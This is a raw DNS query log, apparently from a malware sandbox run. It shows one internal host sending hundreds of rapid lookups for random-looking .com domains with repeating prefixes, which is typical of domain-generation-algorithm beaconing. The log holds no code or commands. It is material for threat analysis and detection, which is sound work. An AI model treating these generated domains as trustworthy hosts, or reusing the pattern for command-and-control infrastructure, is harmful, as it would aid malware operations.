Aug 23, 2024 18:48:55.757245064 CEST	192.168.2.4	1.1.1.1	0xb1b3	Standard query (0)	gaqynih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.757791996 CEST	192.168.2.4	1.1.1.1	0xd7d	Standard query (0)	lyxysad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.758251905 CEST	192.168.2.4	1.1.1.1	0x87a8	Standard query (0)	vofykyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.758464098 CEST	192.168.2.4	1.1.1.1	0x81ea	Standard query (0)	qeqyniq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.758802891 CEST	192.168.2.4	1.1.1.1	0x3a4e	Standard query (0)	puzypav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.760114908 CEST	192.168.2.4	1.1.1.1	0xfb8e	Standard query (0)	gadykyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.760230064 CEST	192.168.2.4	1.1.1.1	0xec12	Standard query (0)	lymynuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.761459112 CEST	192.168.2.4	1.1.1.1	0x47da	Standard query (0)	volypof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.761537075 CEST	192.168.2.4	1.1.1.1	0xff3d	Standard query (0)	lymygor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.761653900 CEST	192.168.2.4	1.1.1.1	0x7cd6	Standard query (0)	pumybuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.761811018 CEST	192.168.2.4	1.1.1.1	0xe0ee	Standard query (0)	lysyjex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.761919022 CEST	192.168.2.4	1.1.1.1	0xe11e	Standard query (0)	galypob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.762080908 CEST	192.168.2.4	1.1.1.1	0x2d20	Standard query (0)	qedykep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.762274027 CEST	192.168.2.4	1.1.1.1	0xfbab	Standard query (0)	vonybuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.762492895 CEST	192.168.2.4	1.1.1.1	0x60a1	Standard query (0)	qekytig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.762578011 CEST	192.168.2.4	1.1.1.1	0xd2c4	Standard query (0)	ganyvyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.762727976 CEST	192.168.2.4	1.1.1.1	0x1c4f	Standard query (0)	lykytin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.762939930 CEST	192.168.2.4	1.1.1.1	0xb429	Standard query (0)	qebyvyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.763025045 CEST	192.168.2.4	1.1.1.1	0xd5db	Standard query (0)	vopyjac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.763315916 CEST	192.168.2.4	1.1.1.1	0x1130	Standard query (0)	pupyjap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.763518095 CEST	192.168.2.4	1.1.1.1	0xae74	Standard query (0)	pujytug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.763880968 CEST	192.168.2.4	1.1.1.1	0x32cf	Standard query (0)	gatyhos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.764007092 CEST	192.168.2.4	1.1.1.1	0x1506	Standard query (0)	lyvyver.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.764122963 CEST	192.168.2.4	1.1.1.1	0xcd8a	Standard query (0)	vojyrum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.764341116 CEST	192.168.2.4	1.1.1.1	0xe2f2	Standard query (0)	qetyhov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.801491022 CEST	192.168.2.4	1.1.1.1	0x693e	Standard query (0)	puvycel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.802109957 CEST	192.168.2.4	1.1.1.1	0xfc03	Standard query (0)	gahyruh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.802692890 CEST	192.168.2.4	1.1.1.1	0x6d9f	Standard query (0)	lyrygid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.803289890 CEST	192.168.2.4	1.1.1.1	0xf431	Standard query (0)	vocycat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.804121971 CEST	192.168.2.4	1.1.1.1	0x9dcc	Standard query (0)	qegyryq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.804783106 CEST	192.168.2.4	1.1.1.1	0xbc65	Standard query (0)	purygiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.805429935 CEST	192.168.2.4	1.1.1.1	0x208c	Standard query (0)	gacycaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.805819035 CEST	192.168.2.4	1.1.1.1	0xb3ec	Standard query (0)	lygywyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.806212902 CEST	192.168.2.4	1.1.1.1	0xdc8b	Standard query (0)	vowyguf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.806632996 CEST	192.168.2.4	1.1.1.1	0xb0e7	Standard query (0)	qexyxop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.806802988 CEST	192.168.2.4	1.1.1.1	0x890d	Standard query (0)	pufyweq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.807542086 CEST	192.168.2.4	1.1.1.1	0x58dc	Standard query (0)	gaqyfub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.807542086 CEST	192.168.2.4	1.1.1.1	0xb31e	Standard query (0)	lyxyxox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.807985067 CEST	192.168.2.4	1.1.1.1	0x5139	Standard query (0)	vofyqek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.808262110 CEST	192.168.2.4	1.1.1.1	0xfbd4	Standard query (0)	qeqyfug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.808698893 CEST	192.168.2.4	1.1.1.1	0x5dfb	Standard query (0)	puzyxip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.809022903 CEST	192.168.2.4	1.1.1.1	0x24b6	Standard query (0)	gadyqaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.809190989 CEST	192.168.2.4	1.1.1.1	0x98d4	Standard query (0)	lymyfyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.809591055 CEST	192.168.2.4	1.1.1.1	0x275f	Standard query (0)	volyzic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.810278893 CEST	192.168.2.4	1.1.1.1	0xd40c	Standard query (0)	pumydyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.810317039 CEST	192.168.2.4	1.1.1.1	0xaa8	Standard query (0)	qedyqal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.810864925 CEST	192.168.2.4	1.1.1.1	0x9e0f	Standard query (0)	galyzus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.810952902 CEST	192.168.2.4	1.1.1.1	0x16a1	Standard query (0)	lysymor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.811564922 CEST	192.168.2.4	1.1.1.1	0xc83d	Standard query (0)	vonydem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.811839104 CEST	192.168.2.4	1.1.1.1	0x306f	Standard query (0)	qekyluv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.812417030 CEST	192.168.2.4	1.1.1.1	0xde21	Standard query (0)	pupymol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.812603951 CEST	192.168.2.4	1.1.1.1	0x4c18	Standard query (0)	ganydeh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.812944889 CEST	192.168.2.4	1.1.1.1	0x18e8	Standard query (0)	lykylud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.813354015 CEST	192.168.2.4	1.1.1.1	0x85bb	Standard query (0)	vopymit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.813709974 CEST	192.168.2.4	1.1.1.1	0x54a1	Standard query (0)	pujylyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.813904047 CEST	192.168.2.4	1.1.1.1	0xdd4f	Standard query (0)	qebysaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.814441919 CEST	192.168.2.4	1.1.1.1	0x3788	Standard query (0)	gatyniz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.814883947 CEST	192.168.2.4	1.1.1.1	0xa31d	Standard query (0)	lyvysaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.815319061 CEST	192.168.2.4	1.1.1.1	0xe4ef	Standard query (0)	vojykyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.815689087 CEST	192.168.2.4	1.1.1.1	0xda3a	Standard query (0)	qetynup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.816230059 CEST	192.168.2.4	1.1.1.1	0x45bc	Standard query (0)	puvypoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.816581964 CEST	192.168.2.4	1.1.1.1	0xc860	Standard query (0)	gahykeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.817003012 CEST	192.168.2.4	1.1.1.1	0xdfc5	Standard query (0)	lyrynux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.817471981 CEST	192.168.2.4	1.1.1.1	0x6fd8	Standard query (0)	vocypok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.817730904 CEST	192.168.2.4	1.1.1.1	0x9f6a	Standard query (0)	qegykeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.820060015 CEST	192.168.2.4	1.1.1.1	0x3eb6	Standard query (0)	purybup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.821233988 CEST	192.168.2.4	1.1.1.1	0x252b	Standard query (0)	gacypiw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.821407080 CEST	192.168.2.4	1.1.1.1	0xd887	Standard query (0)	lygyjan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.821441889 CEST	192.168.2.4	1.1.1.1	0x6f35	Standard query (0)	vowybyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.821652889 CEST	192.168.2.4	1.1.1.1	0x4655	Standard query (0)	pufyjag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.821795940 CEST	192.168.2.4	1.1.1.1	0x610f	Standard query (0)	gaqyvys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.821943998 CEST	192.168.2.4	1.1.1.1	0x283f	Standard query (0)	qexytil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.822104931 CEST	192.168.2.4	1.1.1.1	0x45d5	Standard query (0)	lyxytur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.822258949 CEST	192.168.2.4	1.1.1.1	0xfbf4	Standard query (0)	vofyjom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.822412014 CEST	192.168.2.4	1.1.1.1	0x4ed8	Standard query (0)	qeqyvev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.822550058 CEST	192.168.2.4	1.1.1.1	0x9172	Standard query (0)	puzytul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.822819948 CEST	192.168.2.4	1.1.1.1	0x4360	Standard query (0)	lymyved.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.823225021 CEST	192.168.2.4	1.1.1.1	0xf878	Standard query (0)	volyrut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.823262930 CEST	192.168.2.4	1.1.1.1	0xec60	Standard query (0)	pumycav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.823445082 CEST	192.168.2.4	1.1.1.1	0xe3c0	Standard query (0)	qedyhiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.823606968 CEST	192.168.2.4	1.1.1.1	0x2182	Standard query (0)	gadyhoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.823877096 CEST	192.168.2.4	1.1.1.1	0x5d41	Standard query (0)	vonycaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.824091911 CEST	192.168.2.4	1.1.1.1	0x67fb	Standard query (0)	qekyryp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.824091911 CEST	192.168.2.4	1.1.1.1	0xab83	Standard query (0)	lysygij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.824264050 CEST	192.168.2.4	1.1.1.1	0xd4ad	Standard query (0)	galyryz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.824430943 CEST	192.168.2.4	1.1.1.1	0xe1cb	Standard query (0)	pupyguq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.824613094 CEST	192.168.2.4	1.1.1.1	0x92f4	Standard query (0)	ganycob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.824841976 CEST	192.168.2.4	1.1.1.1	0x569c	Standard query (0)	lykywex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.824898958 CEST	192.168.2.4	1.1.1.1	0xb83e	Standard query (0)	vopyguk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.993474007 CEST	192.168.2.4	1.1.1.1	0x60a3	Standard query (0)	qebyxog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.994020939 CEST	192.168.2.4	1.1.1.1	0xd0d8	Standard query (0)	pujywep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.994740009 CEST	192.168.2.4	1.1.1.1	0x6a62	Standard query (0)	gatyfuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.995668888 CEST	192.168.2.4	1.1.1.1	0x1cfd	Standard query (0)	lyvyxin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.996340036 CEST	192.168.2.4	1.1.1.1	0xfd8a	Standard query (0)	vojyqac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.996675014 CEST	192.168.2.4	1.1.1.1	0xc948	Standard query (0)	qetyfyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.997113943 CEST	192.168.2.4	1.1.1.1	0x77c4	Standard query (0)	puvyxig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.997519016 CEST	192.168.2.4	1.1.1.1	0xc00e	Standard query (0)	gahyqas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.997766018 CEST	192.168.2.4	1.1.1.1	0x6c0e	Standard query (0)	lyryfyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.998028040 CEST	192.168.2.4	1.1.1.1	0x40a5	Standard query (0)	vocyzum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.998550892 CEST	192.168.2.4	1.1.1.1	0xb4d4	Standard query (0)	qegyqov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.999058008 CEST	192.168.2.4	1.1.1.1	0x33ac	Standard query (0)	purydel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.999162912 CEST	192.168.2.4	1.1.1.1	0x1f40	Standard query (0)	gacyzuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.999572039 CEST	192.168.2.4	1.1.1.1	0xbb57	Standard query (0)	lygymod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.999849081 CEST	192.168.2.4	1.1.1.1	0xda21	Standard query (0)	vowydet.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.000056982 CEST	192.168.2.4	1.1.1.1	0x9b7c	Standard query (0)	qexyluq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.000531912 CEST	192.168.2.4	1.1.1.1	0x439c	Standard query (0)	pufymiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.000907898 CEST	192.168.2.4	1.1.1.1	0x5665	Standard query (0)	lyxylyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.001209021 CEST	192.168.2.4	1.1.1.1	0xdb14	Standard query (0)	gaqydaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.001298904 CEST	192.168.2.4	1.1.1.1	0xfb2d	Standard query (0)	vofymif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.001737118 CEST	192.168.2.4	1.1.1.1	0x7be5	Standard query (0)	qeqysap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.001909018 CEST	192.168.2.4	1.1.1.1	0xa083	Standard query (0)	puzylyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.002355099 CEST	192.168.2.4	1.1.1.1	0x14d4	Standard query (0)	gadynub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.002767086 CEST	192.168.2.4	1.1.1.1	0x6881	Standard query (0)	lymysox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.002947092 CEST	192.168.2.4	1.1.1.1	0x1d05	Standard query (0)	volykek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.003441095 CEST	192.168.2.4	1.1.1.1	0x1388	Standard query (0)	qedynug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.003654957 CEST	192.168.2.4	1.1.1.1	0x195f	Standard query (0)	pumypop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.003988981 CEST	192.168.2.4	1.1.1.1	0x7c3	Standard query (0)	galykew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.004519939 CEST	192.168.2.4	1.1.1.1	0x71d8	Standard query (0)	lysynun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.004729033 CEST	192.168.2.4	1.1.1.1	0x8e2b	Standard query (0)	vonypic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.005242109 CEST	192.168.2.4	1.1.1.1	0xb920	Standard query (0)	qekykal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.005841970 CEST	192.168.2.4	1.1.1.1	0xe2c0	Standard query (0)	pupybyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.006602049 CEST	192.168.2.4	1.1.1.1	0xdb11	Standard query (0)	vopybym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.006711006 CEST	192.168.2.4	1.1.1.1	0xfd42	Standard query (0)	lykyjar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.006869078 CEST	192.168.2.4	1.1.1.1	0x8d9b	Standard query (0)	ganypis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.007461071 CEST	192.168.2.4	1.1.1.1	0xb177	Standard query (0)	qebytuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.007688046 CEST	192.168.2.4	1.1.1.1	0x3728	Standard query (0)	pujyjol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.008230925 CEST	192.168.2.4	1.1.1.1	0xf518	Standard query (0)	lyvytud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.008270025 CEST	192.168.2.4	1.1.1.1	0xbfdc	Standard query (0)	gatyveh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.008872032 CEST	192.168.2.4	1.1.1.1	0xcd1c	Standard query (0)	vojyjot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.010576963 CEST	192.168.2.4	1.1.1.1	0x6b34	Standard query (0)	qetyveq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.010742903 CEST	192.168.2.4	1.1.1.1	0x350f	Standard query (0)	puvytuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.010931969 CEST	192.168.2.4	1.1.1.1	0xe07b	Standard query (0)	lyryvaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.011230946 CEST	192.168.2.4	1.1.1.1	0xe016	Standard query (0)	gahyhiz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.011502028 CEST	192.168.2.4	1.1.1.1	0xea19	Standard query (0)	vocyryf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.011609077 CEST	192.168.2.4	1.1.1.1	0xbef7	Standard query (0)	qegyhip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.011763096 CEST	192.168.2.4	1.1.1.1	0x4d04	Standard query (0)	gacyryb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.011895895 CEST	192.168.2.4	1.1.1.1	0x7e4	Standard query (0)	purycaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.013356924 CEST	192.168.2.4	1.1.1.1	0x23aa	Standard query (0)	lygygux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.013784885 CEST	192.168.2.4	1.1.1.1	0xa1b3	Standard query (0)	qexyreg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.013958931 CEST	192.168.2.4	1.1.1.1	0xee4c	Standard query (0)	gaqycow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.014250994 CEST	192.168.2.4	1.1.1.1	0x5f07	Standard query (0)	pufygup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.014482975 CEST	192.168.2.4	1.1.1.1	0x7a11	Standard query (0)	lyxywen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.014796019 CEST	192.168.2.4	1.1.1.1	0xfacf	Standard query (0)	vofyguc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.014944077 CEST	192.168.2.4	1.1.1.1	0x8a8d	Standard query (0)	qeqyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.015178919 CEST	192.168.2.4	1.1.1.1	0xab76	Standard query (0)	vowycok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.016168118 CEST	192.168.2.4	1.1.1.1	0x5270	Standard query (0)	lymyxir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.016661882 CEST	192.168.2.4	1.1.1.1	0x451f	Standard query (0)	puzywag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.016830921 CEST	192.168.2.4	1.1.1.1	0xfc65	Standard query (0)	volyqam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.016974926 CEST	192.168.2.4	1.1.1.1	0x9d72	Standard query (0)	qedyfyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.017924070 CEST	192.168.2.4	1.1.1.1	0x4e4d	Standard query (0)	galyqoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.018168926 CEST	192.168.2.4	1.1.1.1	0x9a35	Standard query (0)	gadyfys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.018418074 CEST	192.168.2.4	1.1.1.1	0x8d87	Standard query (0)	lysyfed.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.018610954 CEST	192.168.2.4	1.1.1.1	0xf456	Standard query (0)	pumyxul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.246710062 CEST	192.168.2.4	1.1.1.1	0xed97	Standard query (0)	gahyhiz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.956587076 CEST	192.168.2.4	1.1.1.1	0x55c5	Standard query (0)	vonyzut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.957114935 CEST	192.168.2.4	1.1.1.1	0xc027	Standard query (0)	qekyqoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.957720995 CEST	192.168.2.4	1.1.1.1	0xe03b	Standard query (0)	pupydev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.957720995 CEST	192.168.2.4	1.1.1.1	0x5e64	Standard query (0)	lykymij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.958061934 CEST	192.168.2.4	1.1.1.1	0x672e	Standard query (0)	qebylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.958406925 CEST	192.168.2.4	1.1.1.1	0x8f23	Standard query (0)	pujymiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.958818913 CEST	192.168.2.4	1.1.1.1	0xdb37	Standard query (0)	gatydab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.958905935 CEST	192.168.2.4	1.1.1.1	0xf328	Standard query (0)	lyvylyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.959393978 CEST	192.168.2.4	1.1.1.1	0xef12	Standard query (0)	qetysog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.959475040 CEST	192.168.2.4	1.1.1.1	0x275f	Standard query (0)	vojymuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.959902048 CEST	192.168.2.4	1.1.1.1	0x28fe	Standard query (0)	puvylep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.960303068 CEST	192.168.2.4	1.1.1.1	0xd66c	Standard query (0)	lyryson.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.960427999 CEST	192.168.2.4	1.1.1.1	0x52a5	Standard query (0)	gahynuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.960660934 CEST	192.168.2.4	1.1.1.1	0x93aa	Standard query (0)	vocykec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.961215019 CEST	192.168.2.4	1.1.1.1	0xb314	Standard query (0)	ganyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.961456060 CEST	192.168.2.4	1.1.1.1	0x3d76	Standard query (0)	purypig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.961633921 CEST	192.168.2.4	1.1.1.1	0xfefc	Standard query (0)	qegynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.961702108 CEST	192.168.2.4	1.1.1.1	0x8e78	Standard query (0)	vopydaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.962272882 CEST	192.168.2.4	1.1.1.1	0xf6a6	Standard query (0)	gacykas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.962899923 CEST	192.168.2.4	1.1.1.1	0x87a0	Standard query (0)	lygynyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.963531971 CEST	192.168.2.4	1.1.1.1	0x8823	Standard query (0)	vowypim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.963807106 CEST	192.168.2.4	1.1.1.1	0xbe5	Standard query (0)	qexykav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.963867903 CEST	192.168.2.4	1.1.1.1	0x4981	Standard query (0)	pufybyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.964345932 CEST	192.168.2.4	1.1.1.1	0x4c3c	Standard query (0)	gaqypuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.964345932 CEST	192.168.2.4	1.1.1.1	0xa8e9	Standard query (0)	lyxyjod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.964889050 CEST	192.168.2.4	1.1.1.1	0x684	Standard query (0)	vofybet.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.964889050 CEST	192.168.2.4	1.1.1.1	0x6b8b	Standard query (0)	qeqytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.965409994 CEST	192.168.2.4	1.1.1.1	0xd8f	Standard query (0)	puzyjov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.965650082 CEST	192.168.2.4	1.1.1.1	0x3bed	Standard query (0)	gadyvez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.965650082 CEST	192.168.2.4	1.1.1.1	0x1d49	Standard query (0)	lymytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.966211081 CEST	192.168.2.4	1.1.1.1	0x74a5	Standard query (0)	volyjif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.966895103 CEST	192.168.2.4	1.1.1.1	0x23e7	Standard query (0)	galyhib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.966895103 CEST	192.168.2.4	1.1.1.1	0xcb91	Standard query (0)	qedyvap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.967077017 CEST	192.168.2.4	1.1.1.1	0x5272	Standard query (0)	pumytyq.com	A (IP address)	IN (0x0001)	false
